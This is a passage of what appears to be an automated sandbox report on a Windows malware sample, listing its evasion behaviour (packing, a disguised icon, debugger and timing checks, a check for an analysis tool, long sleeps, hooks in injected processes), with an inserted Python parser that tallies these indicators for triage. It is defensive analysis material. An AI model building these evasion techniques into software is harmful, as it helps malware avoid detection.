                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Code function: 5_2_049CEEAC push FFFFFFB4h; retf 5_2_049CEF2A
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Code function: 5_2_049CBE3C push cs; iretd 5_2_049CBE3D
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Code function: 5_2_049CBF4F push esp; ret 5_2_049CBF50
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Code function: 5_2_049D50EE push cs; retf 5_2_049D50F5
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Code function: 5_2_049D3109 push edx; iretd 5_2_049D310A
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe | Code function: 5_2_049CFBF2 push esi; retf 5_2_049CFBF6
                Source: initial sample | Static PE information: section name: UPX0
                Source: initial sample | Static PE information: section name: UPX1

                Hooking and other Techniques for Hiding and Protection

                Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (132).png
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D8F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00D8F98E
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E01C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00E01C41
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
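Triaging these behaviour rows by hand is slow because the report flattens every table row into one string: the source process is run straight into the signature category with no separator, and many rows end in a "Jump to behavior" link. The parser below is an added example written for this page, not part of the Joe Sandbox report or of Joe Security's tooling. It splits rows of the layout used here and aggregates the anti-analysis indicators the preceding and following sections are built from: push/ret control-flow stubs, reads of the PEB through fs:[30h], rdtsc timing, ProcessDebugPort queries, crash-dialog suppression (NOGPFAULTERRORBOX / NOOPENFILEERRORBOX), instruction interceptors, long Sleep loops and executable names found in memory. The category list and the row layout are assumptions taken from the rows visible on this page; the embedded sample rows are copied from this report (the FIDDLER.EXE row abridged to a single memory dump).

```python
"""Triage helper for flattened Joe Sandbox behaviour rows (added example, not the report's own code).

Row layout assumed from this page:
    "Source: <process or artefact><Category>: <detail>[Jump to behavior]"
"""
import re
from collections import Counter

# Signature categories seen on this page; assumption, extend as needed.
CATEGORIES = (
    "Section loaded", "Key value queried", "Key opened", "Code function",
    "Process information set", "Process information queried", "Process queried",
    "Sandbox detection routine", "API/Special instruction interceptor",
    "Window / User API", "API coverage", "Thread sleep count", "Thread sleep time",
    "Last function", "Binary or memory string", "Static PE information",
    "Icon embedded in binary file",
)
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)(?P<cat>" + "|".join(map(re.escape, CATEGORIES)) +
    r"):\s*(?P<detail>.*?)(?:Jump to behavior)?\s*$"
)
# Code-function details read "<pid_run_addr> <instructions or API chain> <pid_run_addr>".
FUNC_RE = re.compile(r"^(?P<start>\d+_\d+_[0-9A-Fa-f]+)\s+(?P<body>.*?)\s*(?P<end>\d+_\d+_[0-9A-Fa-f]+)$")
PUSH_RET_RE = re.compile(r"^push\w*\b.*;\s*(?:iretd|retf|ret)\b")   # push X; ret-style stubs
PEB_RE = re.compile(r"fs:\[0*30h\]", re.IGNORECASE)                  # TEB->PEB pointer read
SLEEP_COUNT_RE = re.compile(r"^(\d+)\s*>\s*(\d+)$")
SLEEP_TIME_RE = re.compile(r"^-?(\d+)s\s*>=\s*-?(\d+)s$")

# Constructed sample: rows copied from this report, the last memory-string row abridged.
SAMPLE = [
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415ED3 push ebx; iretd 1_2_00416003",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx1_2_03C309B6",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D7E4",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E rdtsc 1_2_03C7096E",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 8052Thread sleep count: 4431 > 30Jump to behavior",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 8052Thread sleep time: -8862000s >= -30000sJump to behavior",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 8052Thread sleep count: 5541 > 30Jump to behavior",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 8052Thread sleep time: -11082000s >= -30000sJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Windows\SysWOW64\ROUTE.EXEProcess queried: DebugPortJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]1_2_03CDE3DB",
    r"Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DA2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DA2622",
    r"Source: qlG7x91YXH.exe, 00000000.00000003.1786183702.000000000104E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE",
]


def parse_line(line):
    """Return (source, category, detail) for a behaviour row, or None for anything else."""
    m = LINE_RE.match(line.strip())
    return (m.group("src").strip(), m.group("cat"), m.group("detail").strip()) if m else None


def triage(lines):
    """Aggregate anti-analysis indicators from flattened report rows."""
    summary = {
        "peb_reads": Counter(),        # code function -> number of fs:[30h] reads
        "rdtsc_functions": set(),      # functions using rdtsc for timing checks
        "push_ret_functions": set(),   # push X; ret / retf / iretd obfuscation stubs
        "sleep_calls": Counter(),      # "<process> TID: <tid>" -> number of sleeps
        "sleep_total": Counter(),      # same key -> total delay as printed by the report
        "debugport_queries": set(),    # processes asking for ProcessDebugPort
        "interceptors": Counter(),     # process -> hooked / special-instruction sites
        "exe_strings": set(),          # executable names found in memory (e.g. analysis tools)
        "error_mode_set": set(),       # processes suppressing crash / open-file dialogs
    }
    for raw in lines:
        parsed = parse_line(raw)
        if parsed is None:
            continue
        src, cat, detail = parsed
        if cat == "Code function":
            f = FUNC_RE.match(detail)
            if not f:
                continue
            start, body = f.group("start"), f.group("body")
            summary["peb_reads"][start] += len(PEB_RE.findall(body))
            if "rdtsc" in body.split():
                summary["rdtsc_functions"].add(start)
            if PUSH_RET_RE.match(body):
                summary["push_ret_functions"].add(start)
        elif cat == "Thread sleep count":
            m = SLEEP_COUNT_RE.match(detail)
            if m:
                summary["sleep_calls"][src] += int(m.group(1))
        elif cat == "Thread sleep time":
            m = SLEEP_TIME_RE.match(detail)
            if m:
                summary["sleep_total"][src] += int(m.group(1))
        elif cat == "Process queried" and "DebugPort" in detail:
            summary["debugport_queries"].add(src)
        elif cat == "API/Special instruction interceptor":
            summary["interceptors"][src] += 1
        elif cat == "Binary or memory string" and detail.upper().endswith(".EXE"):
            summary["exe_strings"].add(detail.upper())
        elif cat == "Process information set" and "ERRORBOX" in detail:
            summary["error_mode_set"].add(src)
    # Keep only functions that actually touched fs:[30h].
    summary["peb_reads"] = Counter({k: v for k, v in summary["peb_reads"].items() if v})
    return summary


def average_sleep(summary):
    """Per-call delay for each sleeping thread, in the units the report prints."""
    return {k: summary["sleep_total"][k] / n for k, n in summary["sleep_calls"].items() if n}


if __name__ == "__main__":
    result = triage(SAMPLE)
    for key, value in result.items():
        print(f"{key}: {dict(value) if isinstance(value, Counter) else sorted(value)}")
    print("average sleep per call:", average_sleep(result))
```

Run it as-is to see the summary for the embedded rows, or pass the page's own lines to `triage()` for the full report. The per-call figure from `average_sleep()` is what separates a few long sleeps from thousands of short ones: both loops on ROUTE.EXE thread 8052 average exactly 2000 per call in the report's own units, which matches a tight delay loop rather than one long wait.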

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_0-98090)
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | API/Special instruction interceptor: Address: 1044474
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: qlG7x91YXH.exe, 00000000.00000003.1786183702.000000000104E000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1762193671.000000000104E000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1761803127.000000000104E000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1761078079.000000000104E000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1762693377.000000000104E000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1766408419.000000000104E000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1761004458.0000000001036000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000002.1797172399.0000000001045000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1779931363.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1762539963.000000000104E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FIDDLER.EXE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E rdtsc 1_2_03C7096E
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Window / User API: threadDelayed 4431
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Window / User API: threadDelayed 5541
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | API coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ROUTE.EXE | API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 8052 | Thread sleep count: 4431 > 30
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 8052 | Thread sleep time: -8862000s >= -30000s
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 8052 | Thread sleep count: 5541 > 30
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 8052 | Thread sleep time: -11082000s >= -30000s
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Last function: Thread delayed
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DDDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00DDDBBE
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DE68EE FindFirstFileW,FindClose, 0_2_00DE68EE
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DE698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00DE698F
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DDD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00DDD076
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DDD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00DDD3A9
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DE9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00DE9642
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DE979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00DE979D
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DE9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00DE9B2B
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DE5C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00DE5C97
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 6_2_02AACB20 FindFirstFileW,FindNextFileW,FindClose, 6_2_02AACB20
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00D742DE
                Source: ROUTE.EXE, 00000006.00000002.3014722953.0000000002DCE000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3015420785.000000000127F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2581420078.000001EFDAADC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E rdtsc 1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417C33 LdrLoadDll, 1_2_00417C33
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DEEAA2 BlockInput, 0_2_00DEEAA2
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DA2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00DA2622
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00D742DE
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D94CE8 mov eax, dword ptr fs:[00000030h] 0_2_00D94CE8
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_01044740 mov eax, dword ptr fs:[00000030h] 0_2_01044740
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_010446E0 mov eax, dword ptr fs:[00000030h] 0_2_010446E0
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_010430E0 mov eax, dword ptr fs:[00000030h] 0_2_010430E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h] 1_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] 1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] 1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] 1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] 1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h] 1_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h] 1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h] 1_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h] 1_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h] 1_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] 1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] 1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] 1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h] 1_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h] 1_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] 1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] 1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] 1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h] 1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h] 1_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h] 1_2_03CD8350
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0634F mov eax, dword ptr fs:[00000030h] 1_2_03D0634F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h] 1_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h] 1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h] 1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h] 1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h] 1_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h] 1_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h] 1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D08324 mov ecx, dword ptr fs:[00000030h] 1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h] 1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h] 1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D062D6 mov eax, dword ptr fs:[00000030h] 1_2_03D062D6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h] 1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h] 1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h] 1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h] 1_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h] 1_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h] 1_2_03CB0283
